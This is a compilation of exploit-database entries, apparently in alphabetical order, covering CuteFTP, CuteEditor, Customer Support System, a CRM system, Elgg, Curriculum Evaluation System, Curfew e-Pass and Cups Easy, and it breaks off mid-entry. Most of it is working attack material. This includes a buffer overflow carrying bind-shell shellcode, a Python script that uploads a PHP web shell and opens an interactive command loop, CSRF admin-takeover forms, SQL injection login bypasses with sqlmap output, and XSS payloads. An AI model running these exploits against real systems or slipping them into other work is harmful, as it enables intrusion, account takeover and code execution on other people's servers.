# Exploit Title: CuteFTP 9.3.0.3 - Denial of Service (PoC)
# Date: 2018-11-05
# Exploit Author: Ismael Nava
# Vendor Homepage: https://www.globalscape.com/cuteftp
# Software Link: https://www.globalscape.com/cuteftp
# Version: 9.3.0.3
# Tested on: Windows 10 Home x64
# CVE : n/a
# STEPS
# Run the python exploit script; it creates Cute.txt (the listing below writes only that file -- the IP.txt named in the later steps is not produced by the script as listed, so type the target hostname/IP yourself)
# Open the program CuteFTP
# Copy the content of the file "Cute.txt"
# Paste the content in the fields Host, Username and Password
# In the field "Hostname or IP" paste the content of the file "IP.txt"
# Click in Connect
# End :)
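# Overflow string pasted into the Host / Username / Password fields (see STEPS).
buffer = 'A' * 1000
try:
    # 'with' closes the handle even if the write fails part-way through.
    with open("Cute.txt", "w") as out:
        out.write(buffer)
    print("Archive ready")
except (IOError, OSError):
    # Narrow except: only a failed open/write is reported as "not ready";
    # a bare except would also mask typos and real bugs in this script.
    print("Archive no ready")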
# Exploit Title : CuteFTP 8.3.1 - Denial Of Service (PoC)
# Exploit Author : Ali Alipour
# WebSite : Alipour.it
# Date: 2018-08-22
# Vendor Homepage : http://www.cuteftp.com/
# Software Link Download : https://filehippo.com/download_cuteftp_pro/4518/
# Tested on : Windows 10 - 64-bit
# Steps to Reproduce
# Run the python exploit script, it will create a new
# file with the name "exploit.txt" just copy the text inside "exploit.txt"
# and start the CuteFTP program.
# In the new window click "File" > "Connect" > "Connect To URL" .
# Now Paste the content of "exploit.txt" into the field: " Connect To URL ".
# Click "OK" and you will see a crash.
#!/usr/bin/python
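# 7000-byte string pasted into the "Connect To URL" dialog (see the steps above).
buffer = "A" * 7000
payload = buffer
try:
    # 'with' closes the handle even if the write fails part-way through;
    # print() with parentheses runs unchanged on Python 2 and 3.
    with open("exploit.txt", "w") as out:
        print("[+] Creating %s bytes evil payload.." % len(payload))
        out.write(payload)
    print("[+] File created!")
except (IOError, OSError):
    # Only a failed open/write is reported; a bare except would also hide
    # typos and real bugs in this script.
    print("File cannot be created")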
# Exploit Title: CuteFTP 5.0 - Buffer Overflow
# Author: Matteo Malvica
# Date: 2018-08-26
# Vendor homepage: www.globalscape.com
# Software: CuteFTP 5.0.4 XP - build 54.8.6.1
# Software Link: http://installer.globalscape.com/pub/cuteftp/archive/english/cuteftp50.exe
# Tested on: Windows XP Profesional SP3 English x86
# STEPS:
# 1. The python script will generate an 'exploit.txt' file.
# 2. Start CuteFTP
# 3. In the program menu click "File" > "Site Manager" > "New" and paste the content of
# the exploit file into the 'label' field and provide a dummy IP addresss.
# 4. Right click on the site name and 'create shortcut'
# 5. Rename the shortcut to whatever name you prefer: this will create an exe that automates exploit loading upon clicking.
# 6. Quit CuteFTP and launch the newly created 'shortcut'.exe
# 7. $ nc [target_ip] 6666
# 8. celebrate moderately
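# Saved return address is overwritten with 0x7C91FCD8 in ntdll.dll (little-endian
# below).  Valid for Windows XP SP3 English x86 only -- the address moves on any
# other ntdll build.
ret = b"\xD8\xFC\x91\x7C"  # ntdll.dll 7C91FCD8
nops = b"\x90" * 30
# msfvenom -p windows/shell_bind_tcp LPORT=6666 -b '\x0a\x00\x0d' -f python
# Everything is a bytes literal and the file is opened in binary mode: with str
# literals, Python 3 would UTF-8-encode every byte >= 0x80 into two bytes on
# write, corrupting the return address and the shellcode.
sc = b""
sc += b"\xdb\xd8\xb8\xa7\x37\x29\x0e\xd9\x74\x24\xf4\x5b\x33"
sc += b"\xc9\xb1\x53\x31\x43\x17\x83\xeb\xfc\x03\xe4\x24\xcb"
sc += b"\xfb\x16\xa2\x89\x04\xe6\x33\xee\x8d\x03\x02\x2e\xe9"
sc += b"\x40\x35\x9e\x79\x04\xba\x55\x2f\xbc\x49\x1b\xf8\xb3"
sc += b"\xfa\x96\xde\xfa\xfb\x8b\x23\x9d\x7f\xd6\x77\x7d\x41"
sc += b"\x19\x8a\x7c\x86\x44\x67\x2c\x5f\x02\xda\xc0\xd4\x5e"
sc += b"\xe7\x6b\xa6\x4f\x6f\x88\x7f\x71\x5e\x1f\x0b\x28\x40"
sc += b"\x9e\xd8\x40\xc9\xb8\x3d\x6c\x83\x33\xf5\x1a\x12\x95"
sc += b"\xc7\xe3\xb9\xd8\xe7\x11\xc3\x1d\xcf\xc9\xb6\x57\x33"
sc += b"\x77\xc1\xac\x49\xa3\x44\x36\xe9\x20\xfe\x92\x0b\xe4"
sc += b"\x99\x51\x07\x41\xed\x3d\x04\x54\x22\x36\x30\xdd\xc5"
sc += b"\x98\xb0\xa5\xe1\x3c\x98\x7e\x8b\x65\x44\xd0\xb4\x75"
sc += b"\x27\x8d\x10\xfe\xca\xda\x28\x5d\x83\x2f\x01\x5d\x53"
sc += b"\x38\x12\x2e\x61\xe7\x88\xb8\xc9\x60\x17\x3f\x2d\x5b"
sc += b"\xef\xaf\xd0\x64\x10\xe6\x16\x30\x40\x90\xbf\x39\x0b"
sc += b"\x60\x3f\xec\xa6\x68\xe6\x5f\xd5\x95\x58\x30\x59\x35"
sc += b"\x31\x5a\x56\x6a\x21\x65\xbc\x03\xca\x98\x3f\x31\x01"
sc += b"\x14\xd9\x2f\x05\x70\x71\xc7\xe7\xa7\x4a\x70\x17\x82"
sc += b"\xe2\x16\x50\xc4\x35\x19\x61\xc2\x11\x8d\xea\x01\xa6"
sc += b"\xac\xec\x0f\x8e\xb9\x7b\xc5\x5f\x88\x1a\xda\x75\x7a"
sc += b"\xbe\x49\x12\x7a\xc9\x71\x8d\x2d\x9e\x44\xc4\xbb\x32"
sc += b"\xfe\x7e\xd9\xce\x66\xb8\x59\x15\x5b\x47\x60\xd8\xe7"
sc += b"\x63\x72\x24\xe7\x2f\x26\xf8\xbe\xf9\x90\xbe\x68\x48"
sc += b"\x4a\x69\xc6\x02\x1a\xec\x24\x95\x5c\xf1\x60\x63\x80"
sc += b"\x40\xdd\x32\xbf\x6d\x89\xb2\xb8\x93\x29\x3c\x13\x10"
sc += b"\x59\x77\x39\x31\xf2\xde\xa8\x03\x9f\xe0\x07\x47\xa6"
sc += b"\x62\xad\x38\x5d\x7a\xc4\x3d\x19\x3c\x35\x4c\x32\xa9"
sc += b"\x39\xe3\x33\xf8"
# 520 bytes of filler up to the saved return address, the address itself, a
# short NOP slide, the shellcode, then 'C' padding so the total is always
# 520 + 4 + 30 + 3572 = 4126 bytes regardless of the shellcode length.
buffer = b"A" * 520 + ret + nops + sc + b"C" * (3572 - len(sc))
payload = buffer
try:
    with open("exploit.txt", "wb") as out:
        print("[+] Creating %s recreational bytes..." % len(payload))
        out.write(payload)
    print("[+] File created!")
except (IOError, OSError):
    print("File cannot be created")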
# Exploit Title: CuteEditor for PHP 6.6 - Directory Traversal
# Google Dork: N/A
# Date: November 17th, 2021
# Exploit Author: Stefan Hesselman
# Vendor Homepage: http://phphtmledit.com/
# Software Link: http://phphtmledit.com/download/phphtmledit.zip
# Version: 6.6
# Tested on: Windows Server 2019
# CVE : N/A
There is a path traversal vulnerability in the browse template feature in CuteEditor for PHP via the "rename file" option. An attacker with access to CuteEditor functions can write HTML templates to any directory inside the web root.
File: /phphtmledit/cuteeditor_files/Dialogs/Include_Security.php, Lines: 109-121
Vulnerable code:
[SNIP]
// Maps a virtual (web) path to a filesystem path.  NOTE(review): neither branch
// normalises $input_path -- '..' segments supplied by the caller survive the plain
// string concatenation below, which is the traversal described in this advisory.
function ServerMapPath($input_path,$absolute_path,$virtual_path)
{
    if($absolute_path!="")
    {
        // Only the virtual prefix is stripped; a '..\' inside $input_path is kept as-is.
        return $absolute_path.str_ireplace($virtual_path,"",$input_path);
    }
    else
    {
        // NOTE(review): the closing parenthesis is misplaced -- strtoupper() wraps the
        // boolean result of the comparison rather than the OS prefix, so the check is
        // case-sensitive and matches "WINNT" only by accident.
        if(strtoupper(substr(PHP_OS, 0, 3) === 'WIN'))
        {
            // Reconstruct DOCUMENT_ROOT from the script path when the SAPI did not set it.
            if(empty($_SERVER['DOCUMENT_ROOT']) && !empty($_SERVER['SCRIPT_FILENAME'])) {
                $_SERVER['DOCUMENT_ROOT'] = str_replace( '\\', '/', substr($_SERVER['SCRIPT_FILENAME'], 0, 0 - strlen($_SERVER['PHP_SELF'])));
            }
            if(empty($_SERVER['DOCUMENT_ROOT']) && !empty($_SERVER['PATH_TRANSLATED'])) {
                $_SERVER['DOCUMENT_ROOT'] = str_replace( '\\', '/', substr(str_replace('\\\\', '\\', $_SERVER['PATH_TRANSLATED']), 0, 0 - strlen($_SERVER['PHP_SELF'])));
            }
            // Raw concatenation: no realpath() and no check that the result stays under DOCUMENT_ROOT.
            return $_SERVER["DOCUMENT_ROOT"].$input_path;
        }
        else
        {
            // Same unchecked concatenation on non-Windows hosts.
            return ucfirst($_SERVER["DOCUMENT_ROOT"]).$input_path;
        }
    }
}
[SNIP]
ServerMapPath() takes 3 arguments: $input_path, $absolute_path, and $virtual_path and is used, among others, in the browse_template.php file.
File:/phphtmledit/cuteeditor_files/Dialogs/browse_Template.php, Lines: 47-56
Vulnerable function (renamefile, line 57):
[SNIP]
switch ($action)
{
[SNIP]
case "renamefile":
rename(ServerMapPath($_GET["filename"],$AbsoluteTemplateGalleryPath,$TemplateGalleryPath),ServerMapPath($_GET["newname"],$AbsoluteTemplateGalleryPath,$TemplateGalleryPath));
print "<script language=\"javascript\">parent.row_click('".$_GET["newname"]."');</script>";
break;
[SNIP]
$input_path is taken straight from $_GET["filename"] (and the destination from $_GET["newname"]); both are attacker-controlled and never normalised, so '..\' segments survive the concatenation. Renaming the template to '..\..\..\poc.html' therefore produces a target such as:
C:\Inetpub\wwwroot\..\..\..\poc.html
Final result: poc.html is written three directories above the template gallery -- inside the web root or above it, depending on how deep the gallery directory sits.
STEPS:
1. Create a poc.html file (XSS PoC will do).
<!-- Harmless marker page: the alert only proves that the file was written to,
     and is served from, the traversed location. Any content would do. -->
<HTML>
<title>Path Traversal PoC</title>
<BODY>
<h1>PoC</h1>
<script>alert('directory traversal');</script>
</BODY>
</HTML>
2. Upload poc.html via the "Insert Templates" page using the "Upload files" option.
3. Select poc.html and select "Rename File".
4. Click on the pencil icon to the right of the poc.html file.
5. Rename file to "..\..\..\poc.html".
6. Press OK. poc.html is written three directories up.
The number of ..\ (or ../) segments needed depends on how deep the template directory sits below the web root; adjust it until the file lands where you want it.
# Exploit Title: Customer Support System 1.0 - (XSS) Cross-Site
Scripting Vulnerability in the "subject" at "ticket_list"
# Date: 28/11/2023
# Exploit Author: Geraldo Alcantara
# Vendor Homepage:
https://www.sourcecodester.com/php/14587/customer-support-system-using-phpmysqli-source-code.html
# Software Link:
https://www.sourcecodester.com/download-code?nid=14587&title=Customer+Support+System+using+PHP%2FMySQLi+with+Source+Code
# Version: 1.0
# Tested on: Windows
# CVE : CVE-2023-49976
*Steps to reproduce:*
1- Log in to the application.
2- Visit the ticket creation/editing page.
3- Create/Edit a ticket and insert the malicious payload into the
"subject" field/parameter.
Payload: <dt/><b/><script>alert(document.domain)</script>
# Exploit Title: Customer Support System 1.0 - Cross-Site Request Forgery (Admin Account Takeover)
# Date: 2020-11-11
# Exploit Author: Ahmed Abbas
# Vendor Homepage: https://www.sourcecodester.com/php/14587/customer-support-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14587&title=Customer+Support+System+using+PHP%2FMySQLi+with+Source+Code
# Version: 1.0
# Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 7.4.4
# Description : Admin Account Takeover
# Vulnerability Details
[+] The save_user action (ajax.php?action=save_user) accepts the full user record, including the username and password fields, and the request carries no anti-CSRF token; a page opened by a logged-in administrator can therefore submit a forged request that sets a new password for user id 1 (the admin account).
# POC - CSRF HTML
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<!-- Host this page on an attacker-controlled site and have a logged-in
     administrator open it: the browser attaches the victim's PHPSESSID cookie
     and save_user rewrites row id=1 of table "users" (the admin account) with
     the password below. No anti-CSRF token is carried in the request.
     As generated, the form still needs a click; add
     document.forms[0].submit() in a <script> for a hands-off version. -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/customer_support/ajax.php?action=save_user" method="POST">
<input type="hidden" name="id" value="1" />
<input type="hidden" name="table" value="users" />
<input type="hidden" name="firstname" value="Administrator" />
<input type="hidden" name="middlename" value="" />
<input type="hidden" name="lastname" value="" />
<input type="hidden" name="username" value="admin" />
<!-- The new admin password; change it before use. -->
<input type="hidden" name="password" value="newpass" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
# Exploit Title: Customer Support System 1.0 - "First Name" & "Last Name" Stored XSS
# Exploit Author: Saeed Bala Ahmed (r0b0tG4nG)
# Date: 2020-12-11
# Google Dork: N/A
# Vendor Homepage: https://www.sourcecodester.com/php/14587/customer-support-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14587&title=Customer+Support+System+using+PHP%2FMySQLi+with+Source+Code
# Affected Version: Version 1
# Tested on: Parrot OS
Step 1. Login to the application with any valid credentials
Step 2. Click on the username in header and select "Manage Account".
Step 3. On "Manage Account" page, insert "<script>alert("r0b0tG4nG")</script>" in both the "First Name" & "Last Name" fields.
Step 4. Complete the other required details and click on save to update user information.
Step 5. This should trigger the XSS payloads. Whenever the user logs in with same valid credentials, the XSS payloads will be triggered
# Title: Customer Support System 1.0 - 'username' Authentication Bypass
# Date: 2020-11-11
# Exploit Author: Ahmed Abbas
# Vendor Homepage: https://www.sourcecodester.com/php/14587/customer-support-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14587&title=Customer+Support+System+using+PHP%2FMySQLi+with+Source+Code
# Version: 1.0
# Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 7.4.4
# Description : Authentication Bypass
# Vulnerability Details:
[+] A SQL injection in the login handler (ajax.php?action=login) lets a remote, unauthenticated attacker bypass authentication: the username value `' or 1=1 or ''='` makes the WHERE clause true for every row, so the password supplied does not matter.
# Malicious POST Request to https://TARGET
POST /customer_support/ajax.php?action=login HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 62
Origin: http://localhost
Connection: close
Referer: http://localhost/customer_support/login.php
Cookie: PHPSESSID=gbattc1r1riap25kr5k2k1ureo
username=' or 1=1 or ''='&password=password&type=1
# Exploit Title: Customer Support System 1.0 - 'id' SQL Injection
# Exploit Author: Saeed Bala Ahmed (r0b0tG4nG)
# Date: 2020-12-11
# Google Dork: N/A
# Vendor Homepage: https://www.sourcecodester.com/php/14587/customer-support-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14587&title=Customer+Support+System+using+PHP%2FMySQLi+with+Source+Code
# Affected Version: Version 1
# Patched Version: Unpatched
# Category: Web Application
# Tested on: Parrot OS
Step 1. Login to the application with admin credentials
Step 2. Click on Customer and select list.
Step 3. On Customer list page, click on action and select edit. Capture the request made to "http://localhost/index.php?page=edit_customer&id=2" in burpsuite
Step 4. Save request and run sqlmap on request file using command " sqlmap -r request -p id --time-sec=5 --dbs ".
Step 5. sqlmap confirms the injection and, with --dbs, enumerates every database the application's MySQL account can see. (The output below was recorded against page=edit_staff&id=1 rather than the edit_customer request from step 3; both pages pass the `id` GET parameter.)
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: page=edit_staff&id=1 AND 4164=4164
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: page=edit_staff&id=1 AND (SELECT 9430 FROM (SELECT(SLEEP(5)))HIyV)
Type: UNION query
Title: Generic UNION query (NULL) - 10 columns
Payload: page=edit_staff&id=-8018 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a716a71,0x497a58666d50656449704b4d76784f43577748416175666f44685869774177416f454c546458536d,0x717a7a6a71),NULL,NULL,NULL,NULL,NULL-- -
---
# Exploit Title: Customer Support System 1.0 - 'description' Stored XSS in The Admin Panel
# Date: 2020-11-11
# Exploit Author: Ahmed Abbas
# Vendor Homepage: https://www.sourcecodester.com/php/14587/customer-support-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14587&title=Customer+Support+System+using+PHP%2FMySQLi+with+Source+Code
# Version: 1.0
# Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 7.4.4
Stored XSS Reproduction Steps:
1. Navigate to http://TARGET/customer_support/index.php?page=department_list
2. Click on new Department
3. Add the XSS payload into the "description" parameter value
4. Browse to the post to trigger the XSS payload
# POC
POST /customer_support/ajax.php?action=save_department HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------196034062430192961002574272606
Content-Length: 445
Origin: http://localhost
Connection: close
Referer: http://localhost/customer_support/index.php?page=department_list
Cookie: PHPSESSID=6dbp44u1fs8f0ndfqutpn3lbuq
-----------------------------196034062430192961002574272606
Content-Disposition: form-data; name="id"
4
-----------------------------196034062430192961002574272606
Content-Disposition: form-data; name="name"
Stored xss
-----------------------------196034062430192961002574272606
Content-Disposition: form-data; name="description"
<script>alert("STORED XSS")</script>
-----------------------------196034062430192961002574272606--
# Exploit Title: Customer Relationship Management System (CRM) 1.0 - Sql Injection Authentication Bypass
# Date: 27/07/2021
# Exploit Author: Shafique_Wasta
# Vendor Homepage: https://www.sourcecodester.com/php/14794/customer-relationship-management-crm-system-php-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/crm_0.zip
# Version: 1
# Tested on: Windows 10/xampp
# DESCRIPTION #
# Customer relationship management system is vulnerable to Sql Injection Auth Bypass
# Exploit Working:
# 1. Visit http://localhost/crm/customer/login.php
# 2. You will see the login panel
# 3. use this payload ( '=' 'or' ) in username and click on signin you will login into the admin account.
# Vulnerable URL :http://localhost/crm/customer/login.php
# Payload: '=' 'or'
# Exploit Title: Customer Relationship Management System (CRM) 1.0 - Remote Code Execution
# Date: 21.06.2021
# Exploit Author: Ishan Saha
# Vendor Homepage: https://www.sourcecodester.com/php/14794/customer-relationship-management-crm-system-php-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/crm_0.zip
# Version: 1.x
# Tested on: Ubuntu
# REQUIREMENTS #
# run pip3 install requests colorama beautifulsoup4
# DESCRIPTION #
# # The customer-create and account-update forms of the CRM accept an arbitrary file (here shell.php) in the image field and store it in a web-reachable location; the uploaded file's URL can then be read from the <img> tag on the customer page
# # Exploit Working:
# # 1. Starting a session with the server
# # 2. Registering a user hackerctf : hackerctf and adding payload in image
# # 3. Finding the uploaded file location in the username image tag
# # 4. Running the uploaded file with a cmd parameter to get a shell
#!/usr/bin/python3
import time
from urllib.parse import urljoin

import requests
from bs4 import BeautifulSoup as bs
from colorama import Fore, Back, Style
# Variables : change the URL according to need
# Base URL of the target CRM; every endpoint below is appended to it.
URL = "http://192.168.0.245/crm/"  # CHANGE THIS
# Minimal PHP web shell: runs the `cmd` query parameter through system().
shellcode = "<?php system($_GET['cmd']);?>"
filename = "shell.php"
# Registration fields for the throw-away customer account the script creates.
content_data = dict(
    id="",
    firstname="ishan",
    lastname="saha",
    username="hackerctf",
    password="hackerctf",
)
# Login fields for that same account.
authdata = dict(username="hackerctf", password="hackerctf")
def format_text(title, item):
    """Return ``title : item`` boxed between two rules of '*' characters.

    The rule is sized to the text, *item* is stringified first, and the
    pieces are wrapped in colorama colour codes (yellow rules, bright red
    title, blue item) with a reset at the end.
    """
    item = str(item)
    rule = "\r\n" + "*" * (len(item) + len(title) + 3) + "\r\n"
    pieces = [
        Fore.YELLOW, rule,
        Style.BRIGHT, Fore.RED, title, Fore.RESET,
        " : ",
        Fore.BLUE, item,
        Fore.YELLOW, rule, Fore.RESET,
    ]
    return "".join(pieces)
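ShellSession = requests.Session()
# 1. Register the throw-away customer. The "img" multipart field carries
#    shell.php instead of a picture; the upload status is remembered here
#    because later requests overwrite `response` (the original reported the
#    status of the final GET instead).
response = ShellSession.post(
    URL + "classes/Users.php?f=create_customer",
    data=content_data,
    files={"img": (filename, shellcode, "application/php")},
)
upload_ok = response.status_code == 200
# 2. Log in as that customer and fetch the portal page; its first <img> tag
#    points at the uploaded file.
response = ShellSession.post(URL + "classes/Login.php?f=clogin", data=authdata)
response = ShellSession.get(URL + "customer/")
soup = bs(response.text, "html.parser")
img = soup.find("img")
if img is None or not img.get("src"):
    raise SystemExit("[-] could not find the uploaded file's <img src> on the customer page")
# 3. The src may be relative; resolve it against the page it came from.
location = urljoin(URL + "customer/", img["src"])
print(format_text("Target", URL), end="")
print(format_text("Shell Upload", "success" if upload_ok else "fail"), end="")
print(format_text("shell location", location), end="")
print(format_text("Initiating Shell", "[*]Note- This is a custom shell, upgrade to NC!"))
# 4. Interactive loop: each command is passed as the cmd query parameter.
while True:
    cmd = input(Style.BRIGHT + Fore.RED + "SHELL>>> " + Fore.RESET)
    if cmd == "exit":
        break
    # params= URL-encodes the command, so spaces, '&' and '#' reach system()
    # intact instead of being split or truncated by the request parser.
    print(ShellSession.get(location, params={"cmd": cmd}).content.decode())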
# Exploit Title: Customer Relationship Management (CRM) System 1.0 - 'Category' Persistent Cross site Scripting
# Date: 14-05-2021
# Exploit Author: Vani K G
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/14794/customer-relationship-management-crm-system-php-source-code.html
# Version: 1.0
# Tested on: Windows 10/XAMPP
Stored Cross-site scripting(XSS):
Stored XSS, also known as persistent XSS, is the more damaging of the
two. It occurs when a malicious script is injected directly into a
vulnerable web application.
Attack Vector :
A payload stored in the Category field is rendered unescaped for every user who later opens the page, so the script runs in each visitor's browser and can, for example, exfiltrate that visitor's session cookie.
Vulnerable Parameters: Category input field.
Payload : <script>alert(document.domain)</script>
Vulnerable URL :
http://localhost/crm/admin/?page=services&view=category
Steps To Reproduce :
1) Go to the admin Dashboard
2) Click on Category and click Add New button.
3) Put Payload into the 'Category' input field.
4) Click on Save.
5) XSS payload will be triggered.
source: https://www.securityfocus.com/bid/48946/info
Curverider Elgg is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Curverider Elgg versions 1.7.9 and prior are vulnerable.
http://www.example.com/elgg/mod/file/search.php?subtype=file&page_owner=%22%20style%3d%22position:fixed;width:1000px;height:1000px;display:block;left:0;top:0%22%20onmouseover%3d%22alert%28/XSS/%29%22%20x=%22f
http://www.example.com/elgg/mod/riverdashboard/?content=%22%20style%3d%22position:fixed;width:1000px;height:1000px;display:block;left:0;top:0%22%20onmouseover%3d%22alert%28/XSS/%29%22%20x=%22f&callback=true
http://www.example.com/elgg/pg/embed/upload?internalname=%22%20onmouseover%3d%22alert%28%27XSS%27%29%22%20style%3d%22position:fixed;width:1000px;height:1000px;display:block;left:0;top:0%22
http://www.example.com/elgg/pg/pages/edit/%22%20onmouseover%3d%22alert%28%27XSS%27%29%22%20style%3d%22position:fixed;width:1000px;height:1000px;display:block;left:0;top:0%22
http://www.example.com/elgg/pg/pages/new/?container_guid=%22%20style%3d%22background-image%3aurl%28javascript:alert%28/XSS/%29%29%22%20x=%22
http://www.example.com/elgg/pg/pages/new/?container_guid=%22%20style%3d%22background-image%3aurl%28javascript:alert%28/XSS/%29%29%22%20x=%22
# Exploit Title: Curriculum Evaluation System 1.0 - SQL Injection
# Dork: N/A
# Date: 2018-10-29
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://www.sourcecodester.com/users/janobe
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/curriculumevaluationsystem_0.zip
# Version: 1.0
# Category: Windows
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-18803
# POC:
# 1)
# User: 'or 1=1 or ''='
# ' AnD EXTRAcTVaLUE(22,CoNCaT(0x5c,veRSion(),(SElECT (ElT(1=1,1))),database()))-- Efe
# POC:
# 2)
# User: 'or 1=1 or ''='
# Pass: Null
#
# https://2.bp.blogspot.com/-4O0oZTFkzJE/W9Y4HWcImQI/AAAAAAAAEN4/5P-n-9H6JAQMiN6UpJu340xI4x_-MSjHACLcBGAs/s1600/sql5.png
#[PATH]/frmCourse.vb
#....
#47 Private Sub txtSearch_TextChanged(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles txtSearch.TextChanged
#48 sql = "Select * From tblcourse WHERE Course Like '%" & txtSearch.Text & "%'"
#49 reloadDtg(sql, dtglist)
#50 End Sub
#....
#[PATH]/includes/user.vb
#....
#05 Public Sub login(ByVal username As Object, ByVal pass As Object)
#06 Try
#07
#08 con.Open()
#09 reloadtxt("SELECT * FROM `tbluseraccount` WHERE User_name= '" & username & "' and Pass = sha1('" & pass & "')")
#10
#11
#12 If dt.Rows.Count > 0 Then
#13 If dt.Rows(0).Item("UserType") = "Administrator" Then
#14 MsgBox("Welcome " & dt.Rows(0).Item("UserType"))
#15 'Form1.Text = "User :" & dt.Rows(0).Item("Fullname")
#16 With Form1
#17 .tsAddG.Enabled = True
#18 .tsStudent.Enabled = True
#19 .tsCurriculum.Enabled = True
#20 .tsGrades.Enabled = True
#21 .tsReport.Enabled = True
#22 .tsUtilities.Enabled = True
#23 .tsSearchStudent.Enabled = True
#24 .tsLogin.Image = My.Resources.logout
#25 .tsLogin.Text = "Logout"
#26 End With
#27
#28
#29 LoginForm1.Close()
#30
#31
#32 ElseIf dt.Rows(0).Item("UserType") = "Faculty" Then
#33
#34 MsgBox("Welcome " & dt.Rows(0).Item("UserType"))
#35 'Form1.Text = "User :" & dt.Rows(0).Item("Fullname")
#36 With Form1
#37 .tsAddG.Enabled = True
#38 .tsStudent.Enabled = True
#39 .tsCurriculum.Enabled = True
#40 .tsGrades.Enabled = True
#41 .tsReport.Enabled = True
#42 .tsSearchStudent.Enabled = True
#43 .tsLogin.Image = My.Resources.logout
#44 .tsLogin.Text = "Logout"
#45 End With
#46
#47
#48
#49
#50 LoginForm1.Close()
#51
#52
#53
#54 ElseIf dt.Rows(0).Item("UserType") = "Assistant" Then
#55 MsgBox("Welcome " & dt.Rows(0).Item("UserType"))
#56 'With Form1
#57 With Form1
#58 .tsAddG.Enabled = True
#59 .tsStudent.Enabled = True
#60 .tsCurriculum.Enabled = True
#61 .tsGrades.Enabled = True
#62 .tsReport.Enabled = True
#63
#64 .tsSearchStudent.Enabled = True
#65 .tsLogin.Image = My.Resources.logout
#66 .tsLogin.Text = "Logout"
#67 End With
#68
#69
#70 LoginForm1.Close()
#71 End If
#72
#73 'Form1.UserIdToolStripStatus.Text = dt.Rows(0).Item("UserId")
#74 'Form1.UserToolStripStatus.Text = dt.Rows(0).Item("Fullname")
#75 'Form1.StatusStrip1.Visible = True
#76 'inserting logs
#77 'sql = "INSERT INTO `tbllogs` (`UserId`, `LogDate`,LogMode) " & _
#78 ' " VALUES ('" & dt.Rows(0).Item("UserId") & "',Now(),'Logged in')"
#79 'create(sql)
#80
#81 Else
#82 MsgBox("Acount doest not exist!", MsgBoxStyle.Information)
#83 End If
#84 Catch ex As Exception
#85 MsgBox(ex.Message)
#86 End Try
#87 con.Close()
#88 da.Dispose()
#89 End Sub
#....
# Exploit Title: Curfew e-Pass Management System 1.0 - Stored XSS
# Date: 2/1/2021
# Exploit Author: Arnav Tripathy
# Vendor Homepage: https://phpgurukul.com
# Software Link: https://phpgurukul.com/curfew-e-pass-management-system-using-php-and-mysql/
# Version: 1.0
# Tested on: Windows 10/Wamp
1) Log into the application
2) Click on pass then click add a pass
3) Put <script>alert(1)</script> in the Full name field; fill the remaining fields with any values.
4) Now go to manage passes, view the pass you just created.
5) You'll get popup of alert
# Exploit Title: Curfew e-Pass Management System 1.0 - FromDate SQL
Injection
# Date: 28/9/2023
# Exploit Author: Puja Dey
# Vendor Homepage: https://phpgurukul.com
# Software Link:
https://phpgurukul.com/curfew-e-pass-management-system-using-php-and-mysql/
# Version: 1.0
# Tested on: Windows 10/Wamp
1) login into the application
2) click on report on pass and capture the request in burpsuite
3) Parameter "FromDate" is vulnerable to SQL Injection
Parameter: #1* ((custom) POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: fromdate=' AND (SELECT 6290 FROM (SELECT(SLEEP(5)))Kdfl) AND
'SOzQ'='SOzQ&todate=&submit=
4) Put '*' in the value for the parameter and save the item as cpme
5) Run sqlmap -r cpme --batch --dbs --random-agent
# Title: Cups Easy 1.0 - Cross Site Request Forgery (Password Reset)
# Date: 2020-01-28
# Exploit Author: J3rryBl4nks
# Vendor Homepage: https://sourceforge.net/u/ajayshar76/profile/
# Software Link: https://sourceforge.net/projects/cupseasy/files/cupseasylive-1.0/
# Version: 1.0
# Tested on Windows 10/Kali Rolling
# CVE: CVE-2020-8424, CVE-2020-8425
# The Cups Easy (Purchase & Inventory) 1.0 web application is vulnerable to Cross Site Request Forgery:
# passwordmychange.php and userdelete.php take the target username from the POST body and no
# anti-CSRF token is sent, so a page visited by a logged-in administrator can change the admin
# password (gaining unrestricted access to the site) or delete any user.
# Proof of Concept Code for Password Change:
<html>
<!-- Auto-submitting CSRF page: when a logged-in administrator loads it, the
     browser posts the form with the victim's session cookie attached and
